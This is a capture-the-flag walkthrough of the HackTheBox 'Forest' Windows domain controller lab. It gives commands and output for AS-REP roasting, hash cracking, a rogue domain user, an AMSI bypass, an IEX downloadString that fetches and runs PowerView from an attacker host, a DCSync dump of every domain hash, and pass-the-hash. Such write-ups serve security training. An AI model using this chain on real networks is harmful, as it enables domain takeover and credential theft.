In this walk through, we will be going through the Forest room from HackTheBox. This room is rated as Easy on the platform and it consists of exploitation by AsREProasting to get the initial foothold. For privilege escalation, DC Sync privilege was abused to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Forest |
IPaddress | 10.10.10.161 |
Difficulty | Medium |
OS | Windows |
Description | Forest in an easy difficulty Windows Domain Controller (DC) machine which requires initial foothold via ASREProasting. For privilege escalation, DCSync privilege is abused to dump the hashes. |
Enumeration:
- I started off a regular nmap scan with service version detection and found a lots of ports opened as expected from a Windows box. The most important things to note here was port 88 which is responsible for the Kerberos service. That confirms us that we are working with an AD environment here. Other important ports to look for are – 135, 139, 445 (RPC and SMB) and 3268 (LDAP).
$ sudo nmap -sS -sV 10.10.10.161 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-02 20:43 IST Nmap scan report for 10.10.10.161 Host is up (0.20s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp filtered domain 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-02 15:21:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.28 seconds
- I try to enumerate the SMB ports for any writable shares and found nothing.
- Next, i used rpcclient to enumerate some potential usernames.
$ rpcclient -U '' -N 10.10.10.161 rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480] rpcclient $> exit
- Used Ldapsearch to query the running LDAP service to find more usernames.
$ ldapsearch -H ldap://10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName # requesting: sAMAccountName sAMAccountName: Guest sAMAccountName: DefaultAccount sAMAccountName: FOREST$ sAMAccountName: EXCH01$ sAMAccountName: $331000-VK4ADACQNUCA sAMAccountName: SM_2c8eef0a09b545acb sAMAccountName: SM_ca8c2ed5bdab4dc9b sAMAccountName: SM_75a538d3025e4db9a sAMAccountName: SM_681f53d4942840e18 sAMAccountName: SM_1b41c9286325456bb sAMAccountName: SM_9b69f1b9d2cc45549 sAMAccountName: SM_7c96b981967141ebb sAMAccountName: SM_c75ee099d0a64c91b sAMAccountName: SM_1ffab36a2f5f479cb sAMAccountName: HealthMailboxc3d7722 sAMAccountName: HealthMailboxfc9daad sAMAccountName: HealthMailboxc0a90c9 sAMAccountName: HealthMailbox670628e sAMAccountName: HealthMailbox968e74d sAMAccountName: HealthMailbox6ded678 sAMAccountName: HealthMailbox83d6781 sAMAccountName: HealthMailboxfd87238 sAMAccountName: HealthMailboxb01ac64 sAMAccountName: HealthMailbox7108a4e sAMAccountName: HealthMailbox0659cc1 sAMAccountName: sebastien sAMAccountName: lucinda sAMAccountName: andy sAMAccountName: mark sAMAccountName: santi
- Got a bunch of them and an interesting one here is “svc-alfresco”.
Exploitation:
Performing As-REProasting
- I tried to perform AS-REProasting by querying the DC for any accounts that “Do not have Kereberos Pre-Authentication” set and got success for svc-alfresco. Bingo!
python3 ~/Tools/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 'HTB.LOCAL/' -request Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation Name MemberOf PasswordLastSet LastLogon UAC ------------ ------------------------------------------------------ -------------------------- -------------------------- -------- svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2023-12-02 21:15:09.018446 2023-12-02 21:03:47.001366 0x410200 [email protected]:bcba5e98bbabadff560a22090ca8c772$015503fae0e71887930df93bc020f9f9004428a5c9255570e24dd95da632007c8ddbdf047077a72e09e5c53c46499e7b7df0183c6c140907666959330b08932a563fcf1375d7e7c4fd5910bdb9dfefaa576a38d3adb0c19206daa2a7fa7b448aa58c60a65d8036d08ab44492067d3f3581b78f3d3ad9cdb1d9ccc1e122dea60c6d0ffb1b07488549750d69296a599eab4f4a70305a40edefbef87eeb9d678083a51ce3e60c994f68a87cf501795682695f4501f35afad661b7e3ff71070cfb64ecd445ec6ae16aedbbf6256a1f3a777231ed6c59eb2bd7180c51697ef5c2de155e700d0f661a
- Next, cracked the hash obtained hash using hashcat which gives us the password of our user svc-alfresco.
hashcat -m 18200 hash.txt rockyou.txt -O
svc-alfresco: s3rvice
- Next, i sprayed the creds on to the network using crackmapexec to see if we can access the resources. Got a positive for the DC.
crackmapexec smb 10.10.10.161 -u svc-alfresco -p s3rvice
Performing Pass the Password attack
- Logged into the DC as user svc-alfresco using Evil-WinRM and got the initial foothold and thus the user flag.
evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Post-Compromise Enumeration:
- Next, uploaded the Sharphound ingestor to our target and executed it to gather some useful data.
upload /home/wh1terose/CTF/HTB/machines/Forest/SharpHound.exe
./SharpHound.exe
- Downloaded the generated zip file and imported it to Bloodhound for further analysis.
download "C:/Users/svc-alfresco/Desktop/20231203014749_BloodHound.zip" /home/wh1terose/CTF/HTB/machines/Forest/20231203014749_BloodHound.zip
- Next, we ran some of the pre-build queries in Bloodhound and we found that that the group “Exchange Windows Permissions” has DACL write access to the HTB.LOCAL domain we can access it through the “Account Operators” group. So, if we can access the “Exchange Windows Permissions”, then we can perform a DC-Sync attack to dump the user hashes from the DC.
Privilege Escalation:
- Moving on, added a new user elliot to the Domain, Exchange Windows Permissions group and Remote Management User local group.
net user elliot password /add /domain net group "Exchange Windows Permissions" elliot /add net localgroup "Remote Management Users" elliot /add
- Used the Evil-WinRM inbuilt Bypass-AMSI module to bypass the Defender’s AMSI protection for our scripts.
menu
- Next, downloaded and executed PowerView directly on the target using the below command.
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/Powerview.ps1')
- Now, using the Add-DomainObjectAcl module, provided the DC-Sync rights to our user elliot.
$pass = convertto-securestring 'password' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential ('HTB\elliot', $pass) Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity elliot -Rights DCSync
Performing DC-Sync Attack
- Dumped all the user hashes along with the administrator using impacket’s secretsdump.py script.
$ python3 ~/Tools/impacket/examples/secretsdump.py htb/elliot:'password'@10.10.10.161 Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f::: htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44::: htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: hacked:9601:aad3b435b51404eeaad3b435b51404ee:03c78cf07caa988b31d0a4edad93777f::: elliot:9602:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:8ea4034b35b20ae73f507d025927ddfc::: EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: [*] Kerberos keys grabbed htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913 htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375 htb.local\Administrator:des-cbc-md5:c1e049c71f57343b krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58 krbtgt:des-cbc-md5:9dd5647a31518ca8 htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4 htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983 htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91 htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8 htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81 htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6 htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5 htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2 htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29 htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7 htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538 htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702 htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352 htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701 htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36 htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3 htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054 htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161 htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a htb.local\sebastien:des-cbc-md5:702a3445e0d65b58 htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5 htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32 htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6 htb.local\andy:des-cbc-md5:a2ab5eef017fb9da htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6 htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81 htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9 htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427 htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25 htb.local\santi:des-cbc-md5:4075ad528ab9e5fd hacked:aes256-cts-hmac-sha1-96:b1904704afb3a0f07dfb4f03758d92627572772e832ff1ec57fe95933b895dec hacked:aes128-cts-hmac-sha1-96:b402dad178d9e024a7e13b0e4b603eb3 hacked:des-cbc-md5:9eab406880a85149 elliot:aes256-cts-hmac-sha1-96:713c38d181a9473fd5d44b288a38323ac72bd89d19851648bb4ce3ca9f7556b5 elliot:aes128-cts-hmac-sha1-96:7db9e45c2d3d07fc29eeac5c7aec8d79 elliot:des-cbc-md5:64581620ab75e58a FOREST$:aes256-cts-hmac-sha1-96:ae594c09ac8b176fbce65d1d711ce53164e17e4d4a1d8349a4d26bc3edc69966 FOREST$:aes128-cts-hmac-sha1-96:072f6f6780585a632834e7325639251b FOREST$:des-cbc-md5:fb5dc73e01cbb046 EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6 EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e EXCH01$:des-cbc-md5:8c45f44c16975129 [*] Cleaning up...
- At last, performed a pass the hash attack with the administrator’s hash using Evil-WinRM and got admin access. Captured the root flag and waived it high enough.
evil-winrm.rb -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Also Read: HTB – Escape
Conclusion:
So that was “Forest” for you. This machine contains a Windows Domain Controller (DC), in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which was used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled was cracked to gain the intial foothold. The service account was found to be a member of the Account Operators group, which was then used to add users to privileged Exchange groups. The Exchange group membership was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.